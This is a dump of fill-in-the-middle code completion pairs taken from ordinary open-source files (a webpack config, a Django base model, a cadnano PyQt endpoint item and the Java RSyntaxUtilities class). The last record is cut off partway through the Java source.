prompt
large_stringlengths 70
991k
| completion
large_stringlengths 0
1.02k
|
---|---|
<|file_name|>webpack.config.js<|end_file_name|><|fim▁begin|>const path = require('path');
const ExtractTextPlugin = require('extract-text-webpack-plugin');
const PATHS = {
SRC: path.join(__dirname, 'src')
};
const webpackConfig = {
entry: ['./src/index.jsx'],
plugins: [new ExtractTextPlugin('style.css')],
devtool: 'source-map',
node: {
fs: 'empty'
},
output: {
path: __dirname,
publicPath: '/',
filename: 'bundle.js'
},
module: {
rules: [
{
test: /\.(js|jsx)?$/,
use: [
{
loader: 'eslint-loader'
}
],
include: [PATHS.SRC],
enforce: 'pre'
},
{
test: /\.jsx?$/,
include: [path.resolve('src')],
exclude: /node_modules/,
use: [
{
loader: 'babel-loader',
options: {
cacheDirectory: true
}
}
]
},
{
test: /\.css$/,
use: ['style-loader', 'css-loader']
},
{
test: /\.(woff|eot|ttf|woff2)$/,
use: {
loader: 'url-loader'
}
},
{
test: /\.(jpg|gif|png|svg)$/,
use: {
loader: 'file-loader?name=[name].[hash].[ext]'
}
}
]
},
resolve: {
extensions: ['.js', '.jsx']
},
devServer: {
historyApiFallback: true,
contentBase: './'
}<|fim▁hole|><|fim▁end|> | };
module.exports = webpackConfig; |
<|file_name|>models.py<|end_file_name|><|fim▁begin|>from django.contrib.auth.models import User
from django.db import models
from .utils import create_slug
class BaseModel(models.Model):
created = models.DateTimeField(auto_now_add=True)
last_updated = models.DateTimeField(auto_now=True)
class Meta():<|fim▁hole|><|fim▁end|> | abstract = True |
<|file_name|>endpointitem.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
from math import floor
from typing import (
Tuple,
Any
)
from PyQt5.QtCore import (
QPointF,
QRectF,
Qt
)
from PyQt5.QtGui import (
QBrush,
QPen,
QPainterPath,
QPolygonF,
QMouseEvent,
QPainter
)
from PyQt5.QtWidgets import (
qApp,
QGraphicsItem,
QGraphicsPathItem,
QGraphicsRectItem,
QGraphicsEllipseItem,
QStyleOptionGraphicsItem,
QWidget,
QGraphicsSceneMouseEvent,
QGraphicsSceneHoverEvent
)
from cadnano.gui.palette import getColorObj
from cadnano.views.pathview import pathstyles as styles
from cadnano.views.pathview.tools.pathselection import SelectionItemGroup
from cadnano.views.pathview import (
PathVirtualHelixItemT,
PathXoverItemT,
PathStrandItemT,
PathNucleicAcidPartItemT
)
from cadnano.cntypes import (
StrandT,
DocT,
Vec2T,
WindowT
)
_BASE_WIDTH = styles.PATH_BASE_WIDTH
PP_L5 = QPainterPath() # Left 5' PainterPath
PP_R5 = QPainterPath() # Right 5' PainterPath
PP_L3 = QPainterPath() # Left 3' PainterPath
PP_R3 = QPainterPath() # Right 3' PainterPath
PP_53 = QPainterPath() # Left 5', Right 3' PainterPath
PP_35 = QPainterPath() # Left 5', Right 3' PainterPath
# set up PP_L5 (left 5' blue square)
PP_L5.addRect(0.25 * _BASE_WIDTH,
0.125 * _BASE_WIDTH,
0.75 * _BASE_WIDTH,
0.75 * _BASE_WIDTH)
# set up PP_R5 (right 5' blue square)
PP_R5.addRect(0, 0.125 * _BASE_WIDTH, 0.75 * _BASE_WIDTH, 0.75 * _BASE_WIDTH)
# set up PP_L3 (left 3' blue triangle)
L3_POLY = QPolygonF()
L3_POLY.append(QPointF(_BASE_WIDTH, 0))
L3_POLY.append(QPointF(0.25 * _BASE_WIDTH, 0.5 * _BASE_WIDTH))
L3_POLY.append(QPointF(_BASE_WIDTH, _BASE_WIDTH))
L3_POLY.append(QPointF(_BASE_WIDTH, 0))
PP_L3.addPolygon(L3_POLY)
# set up PP_R3 (right 3' blue triangle)
R3_POLY = QPolygonF()
R3_POLY.append(QPointF(0, 0))
R3_POLY.append(QPointF(0.75 * _BASE_WIDTH, 0.5 * _BASE_WIDTH))
R3_POLY.append(QPointF(0, _BASE_WIDTH))
R3_POLY.append(QPointF(0, 0))
PP_R3.addPolygon(R3_POLY)
# single base left 5'->3'
PP_53.addRect(0, 0.125 * _BASE_WIDTH, 0.5 * _BASE_WIDTH, 0.75 * _BASE_WIDTH)
POLY_53 = QPolygonF()
POLY_53.append(QPointF(0.5 * _BASE_WIDTH, 0))
POLY_53.append(QPointF(_BASE_WIDTH, 0.5 * _BASE_WIDTH))
POLY_53.append(QPointF(0.5 * _BASE_WIDTH, _BASE_WIDTH))
PP_53.addPolygon(POLY_53)
# single base left 3'<-5'
PP_35.addRect(0.50 * _BASE_WIDTH,
0.125 * _BASE_WIDTH,
0.5 * _BASE_WIDTH,
0.75 * _BASE_WIDTH)
POLY_35 = QPolygonF()
POLY_35.append(QPointF(0.5 * _BASE_WIDTH, 0))
POLY_35.append(QPointF(0, 0.5 * _BASE_WIDTH))
POLY_35.append(QPointF(0.5 * _BASE_WIDTH, _BASE_WIDTH))
PP_35.addPolygon(POLY_35)
_DEFAULT_RECT = QRectF(0, 0, _BASE_WIDTH, _BASE_WIDTH)
_NO_PEN = QPen(Qt.NoPen)
MOD_RECT = QRectF(.25*_BASE_WIDTH, -.25*_BASE_WIDTH, 0.5*_BASE_WIDTH, 0.5*_BASE_WIDTH)
class EndpointItem(QGraphicsPathItem):
FILTER_NAME = "endpoint"
def __init__(self, strand_item: PathStrandItemT,
cap_type: str, # low, high, dual
is_drawn5to3: bool):
"""The parent should be a StrandItem."""
super(EndpointItem, self).__init__(strand_item.virtualHelixItem())
self._strand_item = strand_item
self._getActiveTool = strand_item._getActiveTool
self.cap_type = cap_type
self._low_drag_bound = None
self._high_drag_bound = None
self._mod_item = None
self._isdrawn5to3 = is_drawn5to3
self._initCapSpecificState(is_drawn5to3)
p = QPen()
p.setCosmetic(True)
self.setPen(p)
# for easier mouseclick
self._click_area = cA = QGraphicsRectItem(_DEFAULT_RECT, self)
self._click_area.setAcceptHoverEvents(True)
cA.hoverMoveEvent = self.hoverMoveEvent
cA.mousePressEvent = self.mousePressEvent
cA.mouseMoveEvent = self.mouseMoveEvent
cA.setPen(_NO_PEN)
self.setFlag(QGraphicsItem.ItemIsSelectable)
# end def
### SIGNALS ###
### SLOTS ###
### ACCESSORS ###
def idx(self) -> int:
"""Look up ``base_idx``, as determined by :class:`StrandItem `idxs and
cap type."""
if self.cap_type == 'low':
return self._strand_item.idxs()[0]
else: # high or dual, doesn't matter
return self._strand_item.idxs()[1]
# end def
def partItem(self) -> PathNucleicAcidPartItemT:
return self._strand_item.partItem()
# end def
def disableEvents(self):
self._click_area.setAcceptHoverEvents(False)
self.mouseMoveEvent = QGraphicsPathItem.mouseMoveEvent
self.mousePressEvent = QGraphicsPathItem.mousePressEvent
# end def
def window(self) -> WindowT:
return self._strand_item.window()
### PUBLIC METHODS FOR DRAWING / LAYOUT ###
def updatePosIfNecessary(self, idx: int) -> Tuple[bool, SelectionItemGroup]:
"""Update position if necessary and return ``True`` if updated."""
group = self.group()
self.tempReparent()
x = int(idx * _BASE_WIDTH)
if x != self.x():
self.setPos(x, self.y())
# if group:
# group.addToGroup(self)
return True, group
else:
# if group:
# group.addToGroup(self)
return False, group
def safeSetPos(self, x: float, y: float):
"""
Required to ensure proper reparenting if selected
"""
group = self.group()
self.tempReparent()
self.setPos(x, y)
if group:
group.addToGroup(self)
# end def
def resetEndPoint(self, is_drawn5to3: bool):
self.setParentItem(self._strand_item.virtualHelixItem())
self._initCapSpecificState(is_drawn5to3)
upperLeftY = 0 if is_drawn5to3 else _BASE_WIDTH
self.setY(upperLeftY)
# end def
def showMod(self, mod_id: str, color: str):
self._mod_item = QGraphicsEllipseItem(MOD_RECT, self)
self.changeMod(mod_id, color)
self._mod_item.show()
# print("Showing {}".format(mod_id))
# end def
def changeMod(self, mod_id: str, color: str):
self._mod_id = mod_id
self._mod_item.setBrush(QBrush(getColorObj(color)))
# end def
def destroyMod(self):
self.scene().removeItem(self._mod_item)
self._mod_item = None
self._mod_id = None
# end def
def destroyItem(self):
'''Remove this object and references to it from the view
'''
scene = self.scene()
if self._mod_item is not None:
self.destroyMod()
scene.removeItem(self._click_area)
self._click_area = None
scene.removeItem(self)
# end def
### PRIVATE SUPPORT METHODS ###
def _initCapSpecificState(self, is_drawn5to3: bool):
c_t = self.cap_type
if c_t == 'low':
path = PP_L5 if is_drawn5to3 else PP_L3
elif c_t == 'high':
path = PP_R3 if is_drawn5to3 else PP_R5
elif c_t == 'dual':
path = PP_53 if is_drawn5to3 else PP_35
self.setPath(path)
# end def
### EVENT HANDLERS ###
def mousePressEvent(self, event: QGraphicsSceneMouseEvent):
"""Parses a :meth:`mousePressEvent`, calling the appropriate tool
method as necessary. Stores ``_move_idx`` for future comparison.
"""
self.scene().views()[0].addToPressList(self)
idx = self._strand_item.setActiveEndpoint(self.cap_type)
self._move_idx = idx
active_tool_str = self._getActiveTool().methodPrefix()
tool_method_name = active_tool_str + "MousePress"
if hasattr(self, tool_method_name): # if the tool method exists
modifiers = event.modifiers()
getattr(self, tool_method_name)(modifiers, event, self.idx())
def hoverLeaveEvent(self, event: QGraphicsSceneHoverEvent):
self._strand_item.hoverLeaveEvent(event)
# end def
def hoverMoveEvent(self, event: QGraphicsSceneHoverEvent):
"""Parses a :meth:`hoverMoveEvent`, calling the approproate tool
method as necessary.
"""
vhi_num = self._strand_item.idNum()
oligo_length = self._strand_item._model_strand.oligo().length()
msg = "%d[%d]\tlength: %d" % (vhi_num, self.idx(), oligo_length)
self.partItem().updateStatusBar(msg)
active_tool_str = self._getActiveTool().methodPrefix()
if active_tool_str == 'createTool':
return self._strand_item.createToolHoverMove(event, self.idx())
elif active_tool_str == 'addSeqTool':
return self.addSeqToolHoverMove(event, self.idx())
def mouseMoveEvent(self, event: QGraphicsSceneMouseEvent):
"""Parses a :meth:`mouseMoveEvent`, calling the appropriate tool
method as necessary. Updates ``_move_idx`` if it changed.
"""
tool_method_name = self._getActiveTool().methodPrefix() + "MouseMove"
if hasattr(self, tool_method_name): # if the tool method exists
idx = int(floor((self.x() + event.pos().x()) / _BASE_WIDTH))
if idx != self._move_idx: # did we actually move?
modifiers = event.modifiers()
self._move_idx = idx
getattr(self, tool_method_name)(modifiers, idx)
def customMouseRelease(self, event: QMouseEvent):
"""Parses a :meth:`mouseReleaseEvent` from view, calling the appropriate
tool method as necessary. Deletes ``_move_idx`` if necessary.
"""
tool_method_name = self._getActiveTool().methodPrefix() + "MouseRelease"
if hasattr(self, tool_method_name): # if the tool method exists
modifiers = event.modifiers()
x = event.pos().x()
getattr(self, tool_method_name)(modifiers, x) # call tool method
if hasattr(self, '_move_idx'):
del self._move_idx
### TOOL METHODS ###
def modsToolMousePress(self, modifiers: Qt.KeyboardModifiers,
event: QGraphicsSceneMouseEvent,
idx: int):
"""
Checks that a scaffold was clicked, and then calls apply sequence
to the clicked strand via its oligo.
"""
m_strand = self._strand_item._model_strand
self._getActiveTool().applyMod(m_strand, idx)
# end def
def breakToolMouseRelease(self, modifiers: Qt.KeyboardModifiers,
x):
"""Shift-click to merge without switching back to select tool."""
m_strand = self._strand_item._model_strand
if modifiers & Qt.ShiftModifier:
m_strand.merge(self.idx())
# end def
def eraseToolMousePress(self, modifiers: Qt.KeyboardModifiers,
event: QGraphicsSceneMouseEvent,
idx: int):
"""Erase the strand."""
m_strand = self._strand_item._model_strand
m_strand.strandSet().removeStrand(m_strand)
# end def
def insertionToolMousePress(self, modifiers: Qt.KeyboardModifiers,
event: QGraphicsSceneMouseEvent,
idx: int):
"""Add an insert to the strand if possible."""
m_strand = self._strand_item._model_strand
m_strand.addInsertion(idx, 1)
# end def
def paintToolMousePress(self, modifiers: Qt.KeyboardModifiers,
event: QGraphicsSceneMouseEvent,
idx: int):
"""Add an insert to the strand if possible."""
m_strand = self._strand_item._model_strand
if qApp.keyboardModifiers() & Qt.ShiftModifier:
color = self.window().path_color_panel.shiftColorName()
else:
color = self.window().path_color_panel.colorName()
m_strand.oligo().applyColor(color)
# end def
def addSeqToolMousePress(self, modifiers: Qt.KeyboardModifiers,
event: QGraphicsSceneMouseEvent,
idx: int):
oligo = self._strand_item._model_strand.oligo()
add_seq_tool = self._getActiveTool()
add_seq_tool.applySequence(oligo)
# end def
def addSeqToolHoverMove(self, event: QGraphicsSceneHoverEvent,
idx: int):
# m_strand = self._model_strand
# vhi = self._strand_item._virtual_helix_item
add_seq_tool = self._getActiveTool()
add_seq_tool.hoverMove(self, event, flag=self._isdrawn5to3)
# end def
def addSeqToolHoverLeave(self, event: QGraphicsSceneHoverEvent):
self._getActiveTool().hoverLeaveEvent(event)
# end def
def createToolHoverMove(self, idx: int):
"""Create the strand is possible."""
m_strand = self._strand_item._model_strand
vhi = self._strand_item._virtual_helix_item
active_tool = self._getActiveTool()
if not active_tool.isFloatingXoverBegin():
temp_xover = active_tool.floatingXover()
temp_xover.updateFloatingFromStrandItem(vhi, m_strand, idx)
# end def
def createToolMousePress(self, modifiers: Qt.KeyboardModifiers,
event: QGraphicsSceneMouseEvent,
idx: int):
"""Break the strand is possible."""
m_strand = self._strand_item._model_strand
vhi = self._strand_item._virtual_helix_item
active_tool = self._getActiveTool()
if active_tool.isFloatingXoverBegin():
if m_strand.idx5Prime() == idx:
return
else:
temp_xover = active_tool.floatingXover()
temp_xover.updateBase(vhi, m_strand, idx)
active_tool.setFloatingXoverBegin(False)
else:
active_tool.setFloatingXoverBegin(True)
# install Xover
active_tool.attemptToCreateXover(vhi, m_strand, idx)
# end def
def selectToolMousePress(self, modifiers: Qt.KeyboardModifiers,
event: QGraphicsSceneMouseEvent,
idx: int):
"""Set the allowed drag bounds for use by selectToolMouseMove.
"""
# print("%s.%s [%d]" % (self, util.methodName(), self.idx()))
self._low_drag_bound, self._high_drag_bound = self._strand_item._model_strand.getResizeBounds(self.idx())
s_i = self._strand_item
viewroot = s_i.viewroot()
current_filter_set = viewroot.selectionFilterSet()
if (all(f in current_filter_set for f in s_i.strandFilter()) and self.FILTER_NAME in current_filter_set):
selection_group = viewroot.strandItemSelectionGroup()
mod = Qt.MetaModifier
if not (modifiers & mod):
selection_group.clearSelection(False)
selection_group.setSelectionLock(selection_group)
selection_group.pendToAdd(self)
selection_group.processPendingToAddList()
return selection_group.mousePressEvent(event)
# end def
def selectToolMouseMove(self, modifiers: Qt.KeyboardModifiers, idx: int):
"""
Given a new index (pre-validated as different from the prev index),
calculate the new x coordinate for self, move there, and notify the
parent strandItem to redraw its horizontal line.
"""
# end def
def selectToolMouseRelease(self, modifiers: Qt.KeyboardModifiers, x):
"""
If the positional-calculated idx differs from the model idx, it means
we have moved and should notify the model to resize.
If the mouse event had a key modifier, perform special actions:
shift = attempt to merge with a neighbor
alt = extend to max drag bound
"""
m_strand = self._strand_item._model_strand
if modifiers & Qt.ShiftModifier:
self.setSelected(False)
self.restoreParent()
m_strand.merge(self.idx())
# end def
def skipToolMousePress(self, modifiers: Qt.KeyboardModifiers,
event: QGraphicsSceneMouseEvent,
idx: int):
"""Add an insert to the strand if possible."""
m_strand = self._strand_item._model_strand
m_strand.addInsertion(idx, -1)
# end def
def restoreParent(self, pos: QPointF = None):
"""
Required to restore parenting and positioning in the partItem
"""
# map the position
self.tempReparent(pos=pos)
self.setSelectedColor(False)
self.setSelected(False)
# end def
def tempReparent(self, pos: QPointF = None):
vh_item = self._strand_item.virtualHelixItem()
if pos is None:
pos = self.scenePos()
self.setParentItem(vh_item)
temp_point = vh_item.mapFromScene(pos)
self.setPos(temp_point)
# end def
def setSelectedColor(self, use_default: bool):
if use_default == True:
color = getColorObj(styles.SELECTED_COLOR)
else:
oligo = self._strand_item.strand().oligo()
if oligo.shouldHighlight():
color = getColorObj(oligo.getColor(), alpha=128)
else:
color = getColorObj(oligo.getColor())
brush = self.brush()
brush.setColor(color)
self.setBrush(brush)
# end def
def updateHighlight(self, brush: QBrush):
if not self.isSelected():
self.setBrush(brush)
# end def
def itemChange(self, change: QGraphicsItem.GraphicsItemChange,
value: Any) -> bool:
"""Used for selection of the :class:`EndpointItem`
Args:
change: parameter that is changing
value : new value whose type depends on the ``change`` argument
Returns:
If the change is a ``QGraphicsItem.ItemSelectedChange``::
``True`` if selected, other ``False``
Otherwise default to :meth:`QGraphicsPathItem.itemChange()` result
"""<|fim▁hole|> # for selection changes test against QGraphicsItem.ItemSelectedChange
# intercept the change instead of the has changed to enable features.
if change == QGraphicsItem.ItemSelectedChange and self.scene():
active_tool = self._getActiveTool()
if str(active_tool) == "select_tool":
s_i = self._strand_item
viewroot = s_i.viewroot()
current_filter_set = viewroot.selectionFilterSet()
selection_group = viewroot.strandItemSelectionGroup()
# only add if the selection_group is not locked out
if value == True and self.FILTER_NAME in current_filter_set:
if all(f in current_filter_set for f in s_i.strandFilter()):
if self.group() != selection_group or not self.isSelected():
selection_group.pendToAdd(self)
selection_group.setSelectionLock(selection_group)
self.setSelectedColor(True)
return True
else:
return False
# end if
elif value == True:
# don't select
return False
else:
# Deselect
# print("deselect ep")
# Check if strand is being added to the selection group still
if not selection_group.isPending(self._strand_item):
selection_group.pendToRemove(self)
self.tempReparent()
self.setSelectedColor(False)
return False
else: # don't deselect, because the strand is still selected
return True
# end else
# end if
elif str(active_tool) == "paint_tool":
s_i = self._strand_item
viewroot = s_i.viewroot()
current_filter_set = viewroot.selectionFilterSet()
if all(f in current_filter_set for f in s_i.strandFilter()):
if not active_tool.isMacrod():
active_tool.setMacrod()
self.paintToolMousePress(None, None, None)
# end elif
return False
# end if
return QGraphicsPathItem.itemChange(self, change, value)
# end def
def modelDeselect(self, document: DocT):
"""A strand is selected based on whether its low or high endpoints
are selected. this value is a tuple ``(is_low, is_high)`` of booleans
"""
strand = self._strand_item.strand()
test = document.isModelStrandSelected(strand)
low_val, high_val = document.getSelectedStrandValue(strand) if test else (False, False)
if self.cap_type == 'low':
out_value = (False, high_val)
else:
out_value = (low_val, False)
if not out_value[0] and not out_value[1] and test:
document.removeStrandFromSelection(strand)
elif out_value[0] or out_value[1]:
document.addStrandToSelection(strand, out_value)
self.restoreParent()
# end def
def modelSelect(self, document: DocT):
"""A strand is selected based on whether its low or high endpoints
are selected. this value is a tuple ``(is_low, is_high)`` of booleans
"""
strand = self._strand_item.strand()
test = document.isModelStrandSelected(strand)
low_val, high_val = document.getSelectedStrandValue(strand) if test else (False, False)
if self.cap_type == 'low':
out_value = (True, high_val)
else:
out_value = (low_val, True)
self.setSelected(True)
self.setSelectedColor(True)
document.addStrandToSelection(strand, out_value)
# end def
def paint(self, painter: QPainter,
option: QStyleOptionGraphicsItem,
widget: QWidget):
painter.setPen(self.pen())
painter.setBrush(self.brush())
painter.drawPath(self.path())
# end def<|fim▁end|> | |
<|file_name|>RSyntaxUtilities.java<|end_file_name|><|fim▁begin|>/*
* 08/06/2004
*
* RSyntaxUtilities.java - Utility methods used by RSyntaxTextArea and its
* views.
*
* This library is distributed under a modified BSD license. See the included
* RSyntaxTextArea.License.txt file for details.
*/
package com.fr.design.gui.syntax.ui.rsyntaxtextarea;
import java.awt.Color;
import java.awt.Container;
import java.awt.Point;
import java.awt.Rectangle;
import java.awt.Shape;
import java.awt.Toolkit;
import java.util.Map;
import java.util.regex.Pattern;
import java.util.regex.PatternSyntaxException;
import javax.swing.*;
import javax.swing.text.BadLocationException;
import javax.swing.text.Caret;
import javax.swing.text.Document;
import javax.swing.text.Element;
import javax.swing.text.Position;
import javax.swing.text.Segment;
import javax.swing.text.TabExpander;
import javax.swing.text.View;
import com.fr.design.gui.syntax.ui.rsyntaxtextarea.TokenUtils.TokenSubList;
import com.fr.design.gui.syntax.ui.rsyntaxtextarea.folding.FoldManager;
import com.fr.design.gui.syntax.ui.rtextarea.Gutter;
import com.fr.design.gui.syntax.ui.rtextarea.RTextArea;
import com.fr.design.gui.syntax.ui.rtextarea.RTextScrollPane;
/**
* Utility methods used by <code>RSyntaxTextArea</code> and its associated
* classes.
*
* @author Robert Futrell
* @version 0.2
*/
public class RSyntaxUtilities implements SwingConstants {
/**
* Integer constant representing a Windows-variant OS.
*/
public static final int OS_WINDOWS = 1;
/**
* Integer constant representing Mac OS X.
*/
public static final int OS_MAC_OSX = 2;
/**
* Integer constant representing Linux.
*/
public static final int OS_LINUX = 4;
/**
* Integer constant representing an "unknown" OS. 99.99% of the
* time, this means some UNIX variant (AIX, SunOS, etc.).
*/
public static final int OS_OTHER = 8;
/**
* Used for the color of hyperlinks when a LookAndFeel uses light text
* against a dark background.
*/
private static final Color LIGHT_HYPERLINK_FG = new Color(0xd8ffff);
private static final int OS = getOSImpl();
//private static final int DIGIT_MASK = 1;
private static final int LETTER_MASK = 2;
//private static final int WHITESPACE_MASK = 4;
//private static final int UPPER_CASE_MASK = 8;
private static final int HEX_CHARACTER_MASK = 16;
private static final int LETTER_OR_DIGIT_MASK = 32;
private static final int BRACKET_MASK = 64;
private static final int JAVA_OPERATOR_MASK = 128;
/**
* A lookup table used to quickly decide if a 16-bit Java char is a
* US-ASCII letter (A-Z or a-z), a digit, a whitespace char (either space
* (0x0020) or tab (0x0009)), etc. This method should be faster
* than <code>Character.isLetter</code>, <code>Character.isDigit</code>,
* and <code>Character.isWhitespace</code> because we know we are dealing
* with ASCII chars and so don't have to worry about code planes, etc.
*/
private static final int[] dataTable = {
0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, // 0-15
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, // 16-31
4, 128, 0, 0, 0, 128, 128, 0, 64, 64, 128, 128, 0, 128, 0, 128, // 32-47
49, 49, 49, 49, 49, 49, 49, 49, 49, 49, 128, 0, 128, 128, 128, 128, // 48-63
0, 58, 58, 58, 58, 58, 58, 42, 42, 42, 42, 42, 42, 42, 42, 42, // 64-79
42, 42, 42, 42, 42, 42, 42, 42, 42, 42, 42, 64, 0, 64, 128, 0, // 80-95
0, 50, 50, 50, 50, 50, 50, 34, 34, 34, 34, 34, 34, 34, 34, 34, // 96-111
34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 64, 128, 64, 128, 0, // 112-127
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, // 128-143
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, // 144-
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, // 160-
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, // 176-
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, // 192-
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, // 208-
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, // 224-
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 // 240-255.
};
/**
* Used in bracket matching methods.
*/
private static Segment charSegment = new Segment();
/**
* Used in token list manipulation methods.
*/
private static final TokenImpl tempToken = new TokenImpl();
/**
* Used internally.
*/
private static final char[] JS_KEYWORD_RETURN = { 'r', 'e', 't', 'u', 'r', 'n' };
/**
* Used internally.
*/
private static final String BRACKETS = "{([})]";
/**
* Returns a string with characters that are special to HTML (such as
* <code><</code>, <code>></code> and <code>&</code>) replaced
* by their HTML escape sequences.
*
* @param s The input string.
* @param newlineReplacement What to replace newline characters with.
* If this is <code>null</code>, they are simply removed.
* @param inPreBlock Whether this HTML will be in within <code>pre</code>
* tags. If this is <code>true</code>, spaces will be kept as-is;
* otherwise, they will be converted to "<code> </code>".
* @return The escaped version of <code>s</code>.
*/
public static final String escapeForHtml(String s,
String newlineReplacement, boolean inPreBlock) {
if (s==null) {
return null;
}
if (newlineReplacement==null) {
newlineReplacement = "";
}
final String tabString = " ";
boolean lastWasSpace = false;
StringBuilder sb = new StringBuilder();
for (int i=0; i<s.length(); i++) {
char ch = s.charAt(i);
switch (ch) {
case ' ':
if (inPreBlock || !lastWasSpace) {
sb.append(' ');
}
else {
sb.append(" ");
}
lastWasSpace = true;
break;
case '\n':
sb.append(newlineReplacement);
lastWasSpace = false;
break;
case '&':
sb.append("&");
lastWasSpace = false;
break;
case '\t':
sb.append(tabString);
lastWasSpace = false;
break;
case '<':
sb.append("<");
lastWasSpace = false;
break;
case '>':
sb.append(">");
lastWasSpace = false;
break;
default:
sb.append(ch);
lastWasSpace = false;
break;
}
}
return sb.toString();
}
/**
* Returns the rendering hints for text that will most accurately reflect
* those of the native windowing system.
*
* @return The rendering hints, or <code>null</code> if they cannot be
* determined.
*/
public static Map<?,?> getDesktopAntiAliasHints() {
return (Map<?,?>)Toolkit.getDefaultToolkit().
getDesktopProperty("awt.font.desktophints");
}
/**
* Returns the color to use for the line underneath a folded region line.
*
* @param textArea The text area.
* @return The color to use.
*/
public static Color getFoldedLineBottomColor(RSyntaxTextArea textArea) {
Color color = Color.gray;
Gutter gutter = RSyntaxUtilities.getGutter(textArea);
if (gutter!=null) {
color = gutter.getFoldIndicatorForeground();
}
return color;
}
/**
* Returns the gutter component of the scroll pane containing a text
* area, if any.
*
* @param textArea The text area.
* @return The gutter, or <code>null</code> if the text area is not in
* an {@link RTextScrollPane}.
* @see RTextScrollPane#getGutter()
*/
public static Gutter getGutter(RTextArea textArea) {
Gutter gutter = null;
Container parent = textArea.getParent();
if (parent instanceof JViewport) {
parent = parent.getParent();
if (parent instanceof RTextScrollPane) {
RTextScrollPane sp = (RTextScrollPane)parent;
gutter = sp.getGutter(); // Should always be non-null
}
}
return gutter;
}
/**
* Returns the color to use for hyperlink-style components. This method
* will return <code>Color.blue</code> unless it appears that the current
* LookAndFeel uses light text on a dark background, in which case a
* brighter alternative is returned.
*
* @return The color to use for hyperlinks.
* @see #isLightForeground(Color)
*/
public static final Color getHyperlinkForeground() {
// This property is defined by all standard LaFs, even Nimbus (!),
// but you never know what crazy LaFs there are...
Color fg = UIManager.getColor("Label.foreground");
if (fg==null) {
fg = new JLabel().getForeground();
}
return isLightForeground(fg) ? LIGHT_HYPERLINK_FG : Color.blue;
}
/**
* Returns the leading whitespace of a string.
*
* @param text The String to check.
* @return The leading whitespace.
* @see #getLeadingWhitespace(Document, int)
*/
public static String getLeadingWhitespace(String text) {
int count = 0;
int len = text.length();
while (count<len && RSyntaxUtilities.isWhitespace(text.charAt(count))) {
count++;
}
return text.substring(0, count);
}
/**
* Returns the leading whitespace of a specific line in a document.
*
* @param doc The document.
* @param offs The offset whose line to get the leading whitespace for.
* @return The leading whitespace.
* @throws BadLocationException If <code>offs</code> is not a valid offset
* in the document.
* @see #getLeadingWhitespace(String)
*/
public static String getLeadingWhitespace(Document doc, int offs)
throws BadLocationException {
Element root = doc.getDefaultRootElement();
int line = root.getElementIndex(offs);
Element elem = root.getElement(line);
int startOffs = elem.getStartOffset();
int endOffs = elem.getEndOffset() - 1;
String text = doc.getText(startOffs, endOffs-startOffs);
return getLeadingWhitespace(text);
}
private static final Element getLineElem(Document d, int offs) {
Element map = d.getDefaultRootElement();
int index = map.getElementIndex(offs);
Element elem = map.getElement(index);
if ((offs>=elem.getStartOffset()) && (offs<elem.getEndOffset())) {
return elem;
}
return null;
}
/**
* Returns the bounding box (in the current view) of a specified position
* in the model. This method is designed for line-wrapped views to use,
* as it allows you to specify a "starting position" in the line, from
* which the x-value is assumed to be zero. The idea is that you specify
* the first character in a physical line as <code>p0</code>, as this is
* the character where the x-pixel value is 0.
*
* @param textArea The text area containing the text.
* @param s A segment in which to load the line. This is passed in so we
* don't have to reallocate a new <code>Segment</code> for each
* call.
* @param p0 The starting position in the physical line in the document.
* @param p1 The position for which to get the bounding box in the view.
* @param e How to expand tabs.
* @param rect The rectangle whose x- and width-values are changed to
* represent the bounding box of <code>p1</code>. This is reused
* to keep from needlessly reallocating Rectangles.
* @param x0 The x-coordinate (pixel) marking the left-hand border of the
* text. This is useful if the text area has a border, for example.
* @return The bounding box in the view of the character <code>p1</code>.
* @throws BadLocationException If <code>p0</code> or <code>p1</code> is
* not a valid location in the specified text area's document.
* @throws IllegalArgumentException If <code>p0</code> and <code>p1</code>
* are not on the same line.
*/
public static Rectangle getLineWidthUpTo(RSyntaxTextArea textArea,
Segment s, int p0, int p1,
TabExpander e, Rectangle rect,
int x0)
throws BadLocationException {
RSyntaxDocument doc = (RSyntaxDocument)textArea.getDocument();
// Ensure p0 and p1 are valid document positions.
if (p0<0)
throw new BadLocationException("Invalid document position", p0);
else if (p1>doc.getLength())
throw new BadLocationException("Invalid document position", p1);
// Ensure p0 and p1 are in the same line, and get the start/end
// offsets for that line.
Element map = doc.getDefaultRootElement();
int lineNum = map.getElementIndex(p0);
// We do ">1" because p1 might be the first position on the next line
// or the last position on the previous one.
// if (lineNum!=map.getElementIndex(p1))
if (Math.abs(lineNum-map.getElementIndex(p1))>1)
throw new IllegalArgumentException("p0 and p1 are not on the " +
"same line (" + p0 + ", " + p1 + ").");
// Get the token list.
Token t = doc.getTokenListForLine(lineNum);
// Modify the token list 't' to begin at p0 (but still have correct
// token types, etc.), and get the x-location (in pixels) of the
// beginning of this new token list.
TokenSubList subList = TokenUtils.getSubTokenList(t, p0, e, textArea,
0, tempToken);
t = subList.tokenList;
rect = t.listOffsetToView(textArea, e, p1, x0, rect);
return rect;
}
/**
* Returns the location of the bracket paired with the one at the current
* caret position.
*
* @param textArea The text area.
* @param input A point to use as the return value. If this is
* <code>null</code>, a new object is created and returned.
* @return A point representing the matched bracket info. The "x" field
* is the offset of the bracket at the caret position (either just
* before or just after the caret), and the "y" field is the offset
* of the matched bracket. Both "x" and "y" will be
* <code>-1</code> if there isn't a matching bracket (or the caret
* isn't on a bracket).
*/
public static Point getMatchingBracketPosition(RSyntaxTextArea textArea,
Point input) {
if (input==null) {
input = new Point();
}
input.setLocation(-1, -1);
try {
// Actually position just BEFORE caret.
